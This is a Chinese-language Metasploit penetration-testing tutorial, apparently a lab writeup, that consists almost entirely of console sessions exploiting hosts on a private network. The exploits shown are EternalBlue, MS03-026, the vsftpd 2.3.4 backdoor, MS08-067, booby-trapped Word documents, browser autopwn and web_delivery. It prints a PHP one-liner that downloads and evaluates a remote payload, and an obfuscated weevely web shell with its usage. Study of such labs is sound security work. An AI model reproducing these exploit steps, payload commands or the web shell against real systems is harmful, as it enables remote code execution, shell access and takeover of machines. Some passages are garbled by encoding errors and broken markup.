基于Metasploit的软件渗透测试（四）

msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CST
Nmap scan report for 192.168.0.1
…
Nmap scan report for 192.168.0.158
…
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs:  CVE:CVE-2017-0143
| Risk factor: HIGH
…
msf6 > search ms17-010
Matching Modules
================
   #  Name  Disclosure Date  Rank Check  Description
   -  ----  ---------------  ---- -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14   average  YesMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec   2017-03-14   normal   YesMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command  2017-03-14   normal   No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010 normal   No MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14   greatYesSMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >

msf6> use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170
RHOST => 192.168.0.170
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...
[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.0.170:4444
[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
C:\WINNT\system32>

msf> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit/multi/handler> set lhost 192.168.0.150
lhost => 192.168.0.150
msf exploit/multi/handler> set lport 8888
lport => 8888
msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit/multi/handler> run
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800
meterpreter >

msf6 > nmap -sT -A -P0 192.168.0.161
msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161
[*] exec: nmap -sT -A -P0 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CST
Nmap scan report for 192.168.0.161
Host is up (0.00081s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.0.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.
msf6 >search vsftpd
Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >exploit
[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.161:21 - USER: 331 Please specify the password.
[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800

msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.0.150:1
[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 1 is not valid and will be closed
192.168.0.158 windows 2000 自动关机

msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > info
Name: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
Module: exploit/windows/fileformat/ms11_006_createsizeddibsection
Platform: Windows
       Arch: 
Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2010-12-15
Provided by:
  Moti & Xu Hao
  Yaniv Miron aka Lament of ilhack
  jduck 
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows 2000 SP0/SP4 English
  2   Windows XP SP3 English
  3   Crash Target for Debugging
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.doc          yes       The file name.
Payload information:
  Space: 512
  Avoid: 1 characters
Description:
  This module exploits a stack-based buffer overflow in the handling
  of thumbnails within .MIC files and various Office documents. When
  processing a thumbnail bitmap containing a negative 'biClrUsed'
  value, a stack-based buffer overflow occurs. This leads to arbitrary
  code execution. In order to trigger the vulnerable code, the folder
  containing the document must be viewed using the "Thumbnails" view.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3970
  OSVDB (70263)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006
  http://www.securityfocus.com/bid/45662
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[+] msf.doc created at /root/.msf4/local/msf.doc
#cp /root/.msf4/local/msf.doc /home/jerry/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
windows下打开msf.doc
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800

<html>
<title>WEB安全测试实验</title>
<link
rel="stylesheet" type="text/css"
href="../css/style.css">
<head>
<meta
http-equiv="Content-Type" content="text/html;
charset=utf-8">
</head>
<body>
<h1>WEB 安全测试实验</h1>
</body>
</html>

#msfconsole 
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc
[*] Using URL: http://0.0.0.0:8080/default.hta
[*] Local IP: http://192.168.0.150:8080/default.hta
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800

msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
  Id  Name  Type   Information  Connection
  --  ----  ----   ---------------------
  1  meterpreter x86/windows  DESKTOP-9A8VFKB\xiang @ DES 192.168.0.150:4444 -> 192.16
  KTOP-9A8VFKB 8.0.106:8176  (192.168.0.106
 )
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Users\xiang\Downloads
=================================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27 +0800  default.hta
100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52 +0800  desktop.ini
meterpreter > pwd
C:\Users\xiang\Downloads
meterpreter > getuid
Server username: DESKTOP-9A8VFKB\xiang

msf6 > use 9
msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc
[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc
[*] Server started.

msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 27.
msf6 auxiliary(server/browser_autopwn) >
[*] Setup
[*] Starting exploit modules on host 192.168.0.150...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QOSlCDKP
[*] Local IP: http://192.168.0.150:8080/QOSlCDKP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ
[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ
[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF
[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA
[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU
[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD
[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pyJEvk
[*] Local IP: http://192.168.0.150:8080/pyJEvk
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/huhYFRmk
[*] Local IP: http://192.168.0.150:8080/huhYFRmk
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jAzqekl
[*] Local IP: http://192.168.0.150:8080/jAzqekl
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JCbqIs
[*] Local IP: http://192.168.0.150:8080/JCbqIs
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA
[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kRyiwct
[*] Local IP: http://192.168.0.150:8080/kRyiwct
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe
[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe
[*] Server started.
…
[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ
[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ
[*] Server started.

[*] 192.168.0.106ie_createobject - Sending exploit HTML...
[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL
[*] 192.168.0.106mozilla_nstreerange - Sending HTML
[*] 192.168.0.106mozilla_nstreerange - Sending XUL
[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe
[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Interrupt: use the 'exit' command to quit
msf6 auxiliary(server/browser_autopwn) > sessions -i
Active sessions
===============
No active sessions.

msf6 > use server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > run
[*] Auxiliary module running as background job 0.
[*] Searching BES exploits, please wait...
msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 31.071206468
[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f
[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
 Order  Rank   Name   Payload
 -----  ----   ----   -------
 1 Excellent  firefox_webidl_injection  firefox/shell_reverse_tcp on 4442
 2 Excellent  firefox_tostring_console_injection  firefox/shell_reverse_tcp on 4442
 3 Excellent  firefox_svg_plugin  firefox/shell_reverse_tcp on 4442
 4 Excellent  firefox_proto_crmfrequestfirefox/shell_reverse_tcp on 4442
 5 Excellent  webview_addjavascriptinterface   android/meterpreter/reverse_tcp on 4443
 6 Excellent  samsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 4443
 7 Great adobe_flash_worker_byte_array_uaf  windows/meterpreter/reverse_tcp on 4444
 8 Great adobe_flash_domain_memory_uafwindows/meterpreter/reverse_tcp on 4444
 9 Great adobe_flash_copy_pixels_to_byte_arra windows/meterpreter/reverse_tcp on 4444
 10 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444
 11 Great adobe_flash_delete_range_tl_op  osx/x86/shell_reverse_tcp on 4447
 12 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444
 13 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444
 14 Great adobe_flash_shader_drawing_fill  windows/meterpreter/reverse_tcp on 4444
 15 Great adobe_flash_pixel_bender_bofwindows/meterpreter/reverse_tcp on 4444
 16 Great adobe_flash_opaque_background_uaf  windows/meterpreter/reverse_tcp on 4444
 17 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444
 18 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444
 19 Great adobe_flash_hacking_team_uaf   windows/meterpreter/reverse_tcp on 4444
 20 Good wellintech_kingscada_kxclientdownloa windows/meterpreter/reverse_tcp on 44 44
 21 Good ms14_064_ole_code_execution   windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Server started.

[*] Gathering target information for 192.168.0.169
[*] Sending HTML response to 192.168.0.169
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
Name Current Setting  Required  Description
---- ---------------  --------  -----------
SRVHOST  0.0.0.0   yes The local host or network interface to listen on. This
  must be an address on the local machine or 0.0.0.0 to l
  isten on all addresses.
SRVPORT  8080  yesThe local port to listen on.
SSL  falsenoNegotiate SSL for incoming connections
SSLCert  no Path to a custom SSL certificate (default is randomly g
   enerated)
URIPATH noThe URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
 Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOSTyes   The listen address (an interface may be specified)
LPORT  4444 yesThe listen port
Exploit target:
Id  Name
--  ----
   0   Python
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/script/web_delivery) > set lport 8899
lport => 8888
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:8899  
[*] Using URL: http://0.0.0.0:8080/SPzNh9
msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9  
[*] Server started.  
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
在浏览器中输入：http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22
[*] 192.168.0.150   web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
  Id  Name  TypeInformation   Connection
  --  ----  ---------------   ----------
  1   meterpreter php/linux  www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676  (192.168.0.150)
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > dir
Listing: /var/www/html/sec/17
=============================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45 +0800  example.php
meterpreter > pwd
/var/www/html/sec/17
meterpreter > getuid
Server username: www-data

#weevely generate 123456 ./testweb.php
Generated './testweb.php' with password '123456' of 677 byte size.

<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';< span=""></hg$chg&&$i<$l);$jhg++,$ih';<>
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?>

# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456
[+] weevely 4.0.1
[+] Target: 192.168.0.150:8100
[+] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> help
:file_rmRemove remote file.
:file_clearlogRemove string from a file.
:file_editEdit remote file on a local editor.
:file_bzip2  Compress or expand bzip2 files.
:file_upload  Upload file to remote filesystem.
:file_downloadDownload file from remote filesystem. 
:file_ls   List directory content.
:file_webdownload Download an URL.  
:file_cp   Copy single file. 
:file_find Find files with given names and attributes.  
:file_enum Check existence and permissions of a list of paths. 
:file_tar  Compress or expand tar archives. 
:file_touchChange file timestamp.
 :file_zip  Compress or expand zip files. 
 :file_mountMount remote filesystem using HTTPfs.
 :file_gzip Compress or expand gzip files.
 :file_cd   Change current working directory.
 :file_upload2web   Upload file automatically to a web folder and get corresponding URL.
 :file_read Read remote file from the remote filesystem. 
 :file_grep Print lines matching a pattern in multiple files.
 :file_checkGet attributes and permissions of a file.
 :shell_sh  Execute shell commands.
 :shell_php Execute PHP commands. 
 :shell_su  Execute commands with su. 
 :sql_dump  Multi dbms mysqldump replacement.
 :sql_console  Execute SQL query or run console.
 :system_extensionsCollect PHP and webserver extension list.
 :system_info  Collect system information.
 :system_procs List running processes.
 :audit_filesystem Audit the file system for weak permissions.  
 :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess.
 :audit_etcpasswd  Read /etc/passwd with different techniques.  
 :audit_suidsgid   Find files with SUID or SGID flags.  
 :audit_phpconfAudit PHP configuration.  
 :bruteforce_sql   Bruteforce SQL database.  
 :backdoor_tcp Spawn a shell on a TCP port.  
 :backdoor_reversetcp  Execute a reverse TCP shell.  
 :net_scan  TCP Port scan.
 :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target.
 :net_ifconfig Get network interfaces addresses.
 :net_curl  Perform a curl-like HTTP request.
 :net_mail  Send mail.
 :net_phpproxy Install PHP proxy on the target.
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ system_info
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| document_root    | C:/xampp/htdocs                                                                         |
| whoami                 |                                                                                           |
| hostname              | DESKTOP-9A8VFKB                                                                         |
| pwd                    | C:\xampp\htdocs\sec\19                                                                |
| open_basedir           |                                                                                           |
| safe_mode              | False                                                                                     |
| script                 | /sec/19/testweb.php                                                                     |
| script_folder          | C:\xampp\htdocs\sec\19                                                                |
| uname                  | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 |
| os                     | Windows NT                                                                              |
| client_ip              | 192.168.0.150                                                                           |
| max_execution_time   | 30                                                                                        |
| php_self               | /sec/19/testweb.php                                                                     |
| dir_sep                | \                                                                                         |
| php_version            | 5.6.28                                                                                  |
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ autit_filesystem
'autit_filesystem' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

#echo version >resource.rc
#echo loadsounds >> version
#echo loadsounds >>resource.rc

# msfconsole -r resource.rc
…
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 6.1.27-dev
Console  : 6.1.27-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf6 >

# msfconsole -r windows7.rc
…

# msfconsole -r windows10.rc
…

# msfconsole -r android.rc
…

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160
rhost => 192.168.0.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.160:21 - USER: 331 Please specify the password.
[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
